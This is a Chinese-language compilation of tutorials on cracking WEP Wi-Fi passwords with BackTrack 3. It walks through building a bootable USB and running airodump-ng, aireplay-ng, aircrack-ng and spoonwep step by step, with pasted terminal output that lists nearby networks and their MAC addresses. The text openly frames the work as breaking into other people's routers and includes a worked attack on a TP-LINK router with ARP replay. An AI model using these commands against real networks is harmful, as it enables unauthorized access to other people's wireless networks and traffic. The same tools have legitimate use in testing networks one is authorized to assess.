U盘版BT3教程破解wep密码
方便,快捷简单
光盘版BT3, 大概694MB,直接刻盘,然后用光盘引导,即可进入bt3,连接为:
http://ftp.heanet.ie/mirrors/backtrack/bt3-final.iso
U盘版Bt3,大概783MB,连接为:
http://cesium.di.uminho.pt/pub/backtrack/bt3final_usb.iso
准备工作:一张1G以上的U盘,或是SD卡,或是TF卡,当然,TF或SD卡的话,你要有读卡器才能
在电脑上读出来,
建议将U盘格式化成FAT32,这样比较节省空间,至于为什么节省空间,FAT32与FAT格式的比较
请您自己百度去,这里不多说了
格式化完成后,此U盘为空的U盘
插入到电脑USB口
1.下载U盘版bt3的文件
地址为:http://cesium.di.uminho.pt/pub/backtrack/bt3final_usb.iso
文件大概为 783MB
2.将此ISO文件加载到虚拟光驱中,在虚拟光驱中,得到如下文件:
Snap1.jpg
当然,你也可以用winrar解压到目录中,估计应该没啥问题,因为空间问题,我就不想解压了
我是直接加栽到虚拟光驱来用的,省空间,无需解压
3.将虚拟光驱中的文件也就是BT3,BOOT这两件文件夹copy到U盘中去
Snap2.jpg
4.点击开始-运行,输入CMD, 然后回车,进入命令行模式
Snap4.jpg
输入U盘的盘符,我的为I:,然后回车
输入 cd boot 回车
输入 bootinst.bat 回车,就会开始制作BT3
setup1.JPG
开始制作时,会出现这样的画面,大概意思就是,此操作将会重写U盘的MBR(即引导区),如果此分区是您的一个硬盘上的分区,那您的Windows系统将会启动不了,请小心,按X键中止操作,按其他任意键继续制作
我就是在U盘上操作的,所以不用理会,按任意键就可以了
setup2.JPG
上面的图,是制作完成后的提示,设置引导记录成功,按任意键退出制作
制作的过程很快,大概不到十秒,其他,他只是重新写了一下U盘的引导区
就OK了
到此为止,此U盘就可以引导系统进去bt3了
然后,升级下SPOONWEP2版本
上面ISO文件中的SPOONWEP版本太低,我把SPOONWEP2.lzm上传到blog里面了;大家也可以到CSDN上面去下载;
这个文件拷贝粘贴到U盘的BT3\modules\即可
当然,您的电脑如何设置成U盘启动就是您的问题了,我的是USBHDD启动的
----------------------------------------------------我是下流的分割线------------------------------------------------------
破解:引导系统进入BT3的选择画面,选择后面带有KDE的BT3即可,至于为什么选择这个
KDE是啥东西,我不知道,我也不想知道,如果您有性趣,请去自行百度
1.进入bt3桌面后,需要用到的就是命令行模式,其实也不难,注意,我们要启动
bt3的命令行状态,点击下面这个图标就会启动bt3的命令行状态
xiaobai0000000.JPG
就是上图中,画蓝圈的那个图标,我们所有的操作,都需要点击此图标
2.点击图标,进入命令行状态,输入命令:ifconfig -a
此命令,就是列出你电脑中的网卡,如果没有列出,那说明是不支持了
如果列出了,说明支持,也不一定能抓包
xiaobai16666666.JPG
上图就是,输入完命令,回车后看到的信息,注意图中画蓝圈的部分
那里显示的是你网卡的MAC码,我的就是 16-E6结尾的,可以看到
说明是支持我的网卡的,我的无线网卡是:intel 2915ABG ,BT3支持 2915ABG抓包内至的网卡是以 eth0, eth1,eth2.....此类的ID
USB的网卡是以 rausb0, rausb1,rausb2....此类的ID
下面,就要以eth1,我的内至网卡来抓包
2.再打开一个命令窗口,不知道怎么打开的,请去看文章上半部分
打开后,输入命令:airodump-ng -w 123 eth1
然后回车
注意:你自己的无线网卡的ID可能是 Rausb0, 或是 eth0, eth1
命令格式是:airodump-ng -w 123 <网卡ID>
即可
xiaobai2.jpg
输入命令,并回车,即可看到下面的信息:
xiaobai3.jpg
解释一下几个名称
BSSID:扫描到的无线路由的MAC地址,这个地址破解的时候需要用到
PWR:无线路由的信号强度
Beacons:向此路由发送的数据包的数量
#Data:网卡抓到的数据包的数量
CH: 无线路由所在的信道
ENC与CIPHER,这个是无线路由的加密方式
ESSID:无线路由的SSID的名称
我们这次举的例子,要破解的,必须为ENC:wep, CIPHER:wep,如上图的YEROC,就是非常合适的一个破解的对象
至于wpa加密的,由于不能抓到足够的数据包,不知道能不能破解,有兴趣的,你可以自己去试试
现在我们就要查看,那个无线路由的 #Data那一栏的数值变化比较快,数据包比较多,这样我们才能破解
我们看到,YEROC已经有17个数据包了,那我们就破解它
3.开始破解,再打开一个命令行模式,什么?不知道怎么打开命令行模式,抽S,自己看文章上半部分去
打开命令行窗口,运行:spoonwep
然后回车
xiaobai5.jpg
xiaobai6.jpg
打开spoonwep后
Victim MAC:这个栏里,输入我们要破解的无线路由的MAC码,也就是MAC地址
注意:是要破解的无线路由的MAC码,不是你无线网卡的MAC码
Net Card中,选择刚才运行 airodump-ng -w 123 eth1 这个命令中用到的无线网卡我的为eth1,我就选择了eth1
Channel:选择要破解的无线路由所在的信道,YEROC为六,我就选择了六
Inj Rate,为默认即可
Launch那个栏位,选择下拉的第二项0841 REPLAY ATTACK
然后点击 Launch按钮 ,就开始破解了
Yeroc.jpg
开始破解后,要抓到六万到十万的数据包,才能破解
我这个抓了四十分钟才抓够数据包,才破解的
此时,由于在运行,你看不到数据包的变化
没关系此时,再打开一个命令行窗口,输入 airodump-ng -w 123 eth1 然后回车你就会看到#Data 的数据包在不断的变化,因为运行spoonwep时,刚才那个airodump-ng 的窗口会数据显示
所以,开始破解后,再运行一次:airodump-ng -w 123 eth1 你就可以观察数据包数量变化的速度
也就会大概估计大概多长时间才能破解完成了
如果很慢,可以在睡前就开机来运算,进行破解
如果很快,在洗个澡的时间就可以破解了
这就需要你观察破解时,数据包变化的速度,然后再安排个时间来破解了
Over,全文完
BT3下无线破解实战
Intel3945ABG在BT3下无线网络密码破解
===================================
网络上关于无线网络破解的工具有很多,我手头上就有几个:WinaircrackPack, CommView_for_wifi, BT3。
这几个工具运行环境和界面都不同,但是都是基于airodump-ng这个工具的基础之上。其中WinaircrackPack和Commview_for_wifi运行在windows 环境中,要求无线网卡驱动支持网络监听。如果不支持监听,则不能成功,使用中会报错。
BT3是个封装好的linux平台,里面有很多黑客工具,其实就是个黑客工具包。关于如何启动进入BT3有很多介绍可以在网上查询,下面只介绍如何用其中的工具进行破解:
首先启动BT3,进入图形界面,运行一个命令窗口。
root@bt:~# ifconfig -a (查看本机网卡)
eth0 Link encap:Ethernet HWaddr 00:24:81:64:B7:3A
inet addr:192.168.1.105 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST NOTRAILERS RUNNING MULTICAST MTU:1500 Metric:1
RX packets:39 errors:0 dropped:0 overruns:0 frame:0
TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:4774 (4.6 KiB) TX bytes:1974 (1.9 KiB)
Base address:0x4020 Memory:e4600000-e4620000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
wlan0 Link encap:Ethernet HWaddr 00:1F:3C:D8:E9:E6
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
root@bt:~# airmon-ng start wlan0 (开始网络监听,error信息显示不支持或没有启动监
听状态)
Interface Chipset Driver
wlan0 Intel 3945 a/b/g iwl3945 - [phy0]
ERROR: Neither the sysfs interface links nor the iw command is available.
Please download and install iw from https://www.360docs.net/doc/5d11565301.html,/iw.tar.bz2
root@bt:~# modprobe -r iwl3945 (查询状态)
root@bt:~# modprobe ipwraw (启动监听状态)
root@bt:~# airmon-ng start wlan0 (监听状态启动,无线网卡名称变为wifi0)
Interface Chipset Driver
wifi0 Centrino a/b/g ipwraw-ng
一. 利用图形工具spoonwep
root@bt:~# spoonwep (启动spoonwep程序)
说明:该程序是个图形界面,在第一个页面里选择网卡(wifi0)、网卡类型(normal)、是否知
道要破解的无线网。点击下一步。
如果知道要破解的无线网,则在第二个页面里必须填写无线网的MAC地址。接下来就是等待自
动破解了,速度快的话很快就能看到破解的KEY了,^_^。
如果选择了不知道则程序自动扫描能发现的无线网,会比较慢。然后选择一个进行破解,和上
面一样。
二. 完全命令行程序
root@bt:~# airmon-ng start wifi0 6 (将监听网卡换成wifi0, 6 是无线频道,依据实际
情况调整)
Interface Chipset Driver
wifi0 Centrino a/b/g ipwraw-ng (monitor mode enabled)
root@bt:~# airodump-ng --ivs -w default -c 6 wifi0(抓数据包,default是无线网的名
称,根据实际情况调整。程序会在当前目录下生成default-01.ivs文件)
CH 6 ][ Elapsed: 14 mins ][ 2009-08-01 14:12
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:E0:94:46:D6 0 0 39 0 0 6 54. WPA2 CCMP PSK
00:13:46:50:C8:C9 0 0 48 0 0 6 54. WEP WEP default
00:21:27:6E:0E:A6 0 1 3047 16 0 6 54. WEP WEP worldwise
00:25:86:27:7B:A2 0 29 1996 0 0 6 54. WEP WEP TP-LINK_277BA0
00:1E:58:0F:AA:0A 0 39 5206 0 0 6 54. WEP WEP erichou
00:03:7F:BF:01:A2 0 0 549 0 0 6 54. WPA CCMP PSK ALPHA AFW-GR50
00:18:39:3A:58:9A 0 0 238 9 0 6 54 WEP WEP lillian
BSSID STATION PWR Rate Lost Packets Probes
00:13:46:50:C8:C9 00:24:2B:F5:23:82 0 0- 0 12 979 default
00:21:27:6E:0E:A6 00:1F:3B:D0:DE:23 0 0- 0 0 11
00:18:39:3A:58:9A 00:1B:63:C6:EB:60 -1 0- 0 0 6
(not associated) 00:13:02:51:DA:A9 0 0- 0 0 39 KFC-007
(not associated) 00:19:D2:4E:B6:C4 0 0- 0 0 102 azhi
(not associated) 00:18:F3:45:5D:8B 0 0- 0 0 21
TP-LINK_8DCFDC,linksys1
(运行另外一个命令窗口,运行破解)
root@bt:~# aireplay-ng -1 0 -e ap的essid -a ap的mac -h 自己网卡的mac wifi0
Sending Authentication Request
Authentication successful
Sending Association Request
Association successful :-)
这时,airodump-ng窗口的变化
这时候等Data有了1万5就可新开个命令窗口,用aircrack-ng来破解了。
root@bt:~# aircrack-ng default-01.ivs
Opening default-01.ivs
Read 31 packets.
# BSSID ESSID Encryption
1 00:1E:58:0F:AA:0A erichou Unknown
2 00:25:86:27:7B:A2 TP-LINK_277BA0 Unknown
3 00:21:27:6E:0E:A6 worldwise WEP (16 IVs) (实际情况中IVS
必须10000以上才可以破解)
4 00:13:46:50:C8:C9 default Unknown
5 00:03:7F:BF:01:A2 ALPHA AFW-GR50 Unknown
6 00:18:39:3A:58:9A lillian WEP (9 IVs) (实际情况中IVS
必须10000以上才可以破解)
Index number of target network ? 3
Opening default-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 16 ivs.
Aircrack-ng 1.0 rc1 r1085
[00:00:08] Tested 148993 keys (got 16 IVs)
KB depth byte(vote)
0 255/256 FF( 0) 1D( 220) 1E( 220) 3A( 220) 76( 220) 7C( 220) 7E( 220)
1 0/ 10 AA( 440) 08( 220) 3F( 220) 45( 220) 4F( 220) 76( 220) 7A( 220)
2 16/ 2 ED( 72) 10( 36) 14( 36) 19( 36) 2B( 36) 30( 36) 34( 36)
3 0/ 1 1A( 440) 06( 220) 20( 220) 32( 220) 3E( 220) 49( 220) 56( 220)
4 2/ 4 B6( 256) 0A( 220) 15( 220) 3D( 220) 6F( 220) 7C( 220) 83( 220)
Failed. Next try with 5000 IVs.(这种情况就是ivs太少,实际情况中IVS必须10000以上才可以破解)
破解无线路由密码(如何破解无线路由密码)
请注意:部分ATI的显卡进入BT3(linux)系统可能会报错,这不属于光盘问题,请在网上下载ATI 显卡的补丁,或者在网上下载虚拟主机(VM),就可以直接在XP中破解,VISTA系统下,也会进
不了BT3系统,请在XP下尝试破解,感谢您对本款产品支持,如有疑问,请联系各地经销商进行咨询》
准备工作:
1 把电脑设置为光驱启动,U盘版设置为USB启动,如果你不知道如何设置请参考主板说明书,或者直接google一下,(现在很多电脑买回来默认开启光驱启动,所以你不设置说不定也可以)
2 请将BT3光盘放入光驱,重先启动电脑就可以的了,默认是选择第一项 BT
3 Graphics mode (KDE) 进入linux 系统,如果不选择会倒数30秒自动进入。
1》点击左下角第二个图标(黑色)开启一个窗口,输入:spoonwep 回车后10秒左右弹出spoonwep2程序:
NET CARD 网卡接口选择WLAN0
DRIVER 驱动选择NORMAL
MODE 模式选择UNKNOWN VICTIM
点NEXT 转到VICTIMS DISCOVERY窗口:
2》首先点击左上角下拉菜单选择FIXED CHAN
这里的CHAN HOPPING是全频段扫描
点击右上角LAUNCH 按钮 (点完后会变成ABORT ) 这时会弹出抓包窗口,可作为参考,也可不用理会。20秒左右程序会显示扫描到的信息,其中:
ESSID 路由广播名称
MAC 路由的MAC地址
CHAN 使用的频道
POW 信号强度
DATA (注意:这个数值一直为0基本无法破解,你可另寻时机等到有DATA再破)
CLIS 空白代表无客户端,打钩则代表有客户端
选择要攻击的目标路由,然后点SELECTION OK转到ATTACK PANEL窗口:
3》第一个下拉菜单有4个选项,后面3个都可作为无客户端攻击模式,其中:
ARP REPLAY ATTACK(有客户端时用)
P0841 REPLAY ATTACK (次次选)
CHOPCHOP & FORGEATTACK(次选)
FRAGMENTATION & FORGE ATTACK(首选)
第二个下拉菜单有3个选项,其中:
??? LENGTH (不指定加密位数,首选)
128 BITS LENGTH(指定128位加密,次次选)
64 BITS LENGTH (指定64位加密,次选)
两个下拉菜单右边的Inj Rate是每秒发包数量,选默认的600即可。
选择好2个下拉菜单,点击左边 LAUNCH按钮开始自动破解,破解速度和信号强度成正比,信号越强,需要的时间越短,这点还请阁下来做尝试!
下面实战破别人的路由(有客户端模式)选了个最国内最常见的 TP-LINK
注:有客户端模式比无客户端成功率要高。
选中打算破解的路由,下面会显示当前所有连接到这个路由的合法客户端,选择一个 POWER 和PACKETS 都比较高的客户端,最后点SELEETION OK转到
ATTACK PANE L 窗口选中ARP REPLAY ATTACK
点击LAUNCH,之后的工作是全自动的,直到出现WEP Key,此路由密码宣告破解。
最下面的WEP Key既是密码在windows下输入2324252627即可,无需输入冒号。